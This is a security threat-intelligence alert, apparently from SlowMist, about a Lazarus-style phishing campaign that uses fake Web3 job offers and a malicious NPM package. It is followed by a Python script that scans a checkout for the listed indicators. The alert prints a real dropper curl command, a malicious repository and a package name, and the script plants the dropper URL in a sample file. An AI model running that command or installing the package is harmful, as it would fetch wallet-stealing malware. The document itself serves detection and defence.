
SlowMist|Jun 20, 2025 08:56
🚨 Security TI Alert 🚨
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. 120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://gitlab.com/workspace935/web3-game-platform
🔸Dropper: curl https://bs-production.up.railway.app/on -H "x-secret-key: _"
🧪 The attack method closely resembles Lazarus's earlier use of NPM packages to spread malicious code:
https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages
🚨 We found that a new malicious NPM package was just published:
https://www.npmjs.com/package/react-hook-form-ui
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: skelstar125@gmail.com
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing
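
A sweep of a local checkout for the indicators listed in this alert, added here as an example and not part of the original SlowMist post. The function names and the sample project built in `demo()` are constructed for illustration; only the package name, dropper host and GitLab path come from the alert.

```python
import json, os, tempfile
from pathlib import Path

# IOCs copied from the alert text above.
BAD_PACKAGE = "react-hook-form-ui"
BAD_STRINGS = ("bs-production.up.railway.app", "gitlab.com/workspace935/web3-game-platform")
DEP_SECTIONS = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")

def manifest_hits(text):
    """Places in a package.json / package-lock.json that name BAD_PACKAGE."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return []
    data = data if isinstance(data, dict) else {}
    hits = [s for s in DEP_SECTIONS if BAD_PACKAGE in (data.get(s) or {})]
    # Lockfile v2/v3 keys look like "node_modules/a/node_modules/<name>".
    hits += [k for k in (data.get("packages") or {})
             if k.split("node_modules/")[-1] == BAD_PACKAGE]
    return hits

def scan(root):
    """Walk a checkout and return (relative path, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        here = Path(dirpath)
        if here.name == BAD_PACKAGE and here.parent.name == "node_modules":
            findings.append((str(here.relative_to(root)), "installed package"))
        for name in filenames:
            path = here / name
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            rel = str(path.relative_to(root))
            if name in ("package.json", "package-lock.json"):
                findings += [(rel, "dependency: " + h) for h in manifest_hits(text)]
            findings += [(rel, "string: " + s) for s in BAD_STRINGS if s in text]
    return findings

def demo():
    """Run scan() over a constructed sample project (not real campaign files)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(json.dumps(
            {"dependencies": {"react": "^18.0.0", BAD_PACKAGE: "^1.0.0"}}))
        (root / "setup.sh").write_text("curl https://" + BAD_STRINGS[0] + "/on\n")
        return sorted(scan(root))
```

Run `scan()` on a cloned repository before any `npm install`, since install-time scripts execute as soon as dependencies are fetched.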